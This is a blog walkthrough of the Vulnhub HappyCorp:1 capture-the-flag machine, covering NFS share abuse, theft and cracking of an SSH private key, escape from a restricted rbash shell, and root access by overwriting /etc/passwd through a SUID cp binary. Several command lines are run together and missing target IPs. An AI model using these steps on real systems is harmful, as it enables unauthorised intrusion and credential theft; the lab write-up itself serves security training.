Happycorp:1 Vulnhub Walkthrough

This is another post on vulnhub CTF “named as “HAPPYCORP:1” by Zayotic. It is designed for VMware platform, and it is a boot to root challenge where you have to find flags to finish the task assigned by the author.

You can download it from here: https://www.vulnhub.com/entry/happycorp-1,296/

Penetrating Methodologies


  • Netdiscover
  • Nmap


  • NFS-Share
  • Mount share directory
  • Obtain user.txt -1st flag
  • Obtain SSH key
  • Cracked SSH passphrase (john the ripper)


  • Login to SSH
  • Break jail (rbash shell)

Privilege Escalation

  • Abusing SUID Binary
  • Obtain flag.txt-2nd flag



Let’s start with network scanning to identify the IP of VM with the help of netdiscover.

So, we have our target IP Now, let’s scan the services and ports via nmap.

1nmap -A

We have obtained the fruitful result from the nmap scan, as you can observe so many services are running on the various port. Such as 22: SSH, 80: HTTP and so on.


As we always navigate with HTTP services first, therefore we browse as the URL but found nothing interesting.

We found that network share service was also available on port 2049, so we thought to check shared directory in the network. We have therefore installed NFS-client on our local machine and have a command to identify the shared directory available to mount on our local computer.

1showmount -e

we found /home/karl is a shared directory that we can mount in our local machine as given below:

1234mkdir /tmp/rajmount /tmp/rajcd /tmp/rajls -al

As I mount /home/karl in our /tmp/raj directory but I didn’t find anything here, truthfully when I try to open .ssh directory, it gave permission denied error.

Therefore, I add a user “aaru” in the group that has GID of 1001 on my Kali machine and successfully access the .ssh folder as shown in below steps (Same as the approach was used in Lin-Security).

12groupadd –gid 1001 aaruuseradd –uid 1001 –group raj aaru

Then access our 1st flag i.e. user.txt and moreover copies the id_rsa key in our local machine by executing following command:

123sudo -u aaru ls -l .sshsudo -u aaru cat .ssh/user.txtsudo -u aaru cat .ssh/id_rsa

Further, I explored id _rsa.pub and authorized key where I noticed Karl@happycorp and realized that Karl could be the possible username for ssh login. Therefore, I used the id_rsa key for login into ssh as karl but failed to login into it, as it required a passphrase for the key.

Then we have used ssh2john to convert this SSH key into a crackable file for John the ripper and further used the rockyou.txt wordlist for johntheripper.

12python ssh2john key > ssh_loginjohn –wordlist=/usr/share/wordlists/rockyou.txt crack.txt

After obtaining the passphrase “sheep” we changed the permission of RSA key and login as karl but unfortunately, we got access of restricted shell also known rbash as a shell.

1ssh -i key karl@

Therefore, I tried to access the bash shell directly through ssh by simply typing the following:

1ssh -i key karl@ -t “/bin/sh”

Luckily it works and we have successfully access the proper shell.

Privilege Escalation

Now it’s time to escalate the root privilege and finish this task, therefore with help of find command I look for SUID enabled binaries, where I found SUID bit, is enabled for copy binary (/bin/cp).

1find / -perm -u=s -type f 2>/dev/null

Hmm!! if suid bit is enabled on /bin/cp then we can copy any system file of root level or can overwrite the existing file.   First, I have explored the /etc /passwd file where karl was end user as shown in the below image and our vision is to edit this file by adding a new user.

On other hands, we have generated a new encrypted password: pass123 using OpenSSL passwd

1openssl passwd -1 -salt ignite pass123

So, we have copied the whole content of /etc/passwd file in a text editor and then create a new record for user “ignite that owns root level permissions. Saved this file as passwd and further used python server for transferring it into victim’s machine.

Inside /tmp folder, we have downloaded our passwd file and with the help of copy command, we have replaced the original /etc/passwd from our file as shown below.

123456cd /tmpwget passwd /etc/passwdsu ignitecd rootcat root.txt

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here


Raj Chandel is Founder and CEO of Hacking Articles

Trả lời

Please log in using one of these methods to post your comment:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Đăng xuất /  Thay đổi )

Google photo

Bạn đang bình luận bằng tài khoản Google Đăng xuất /  Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Đăng xuất /  Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Đăng xuất /  Thay đổi )

Connecting to %s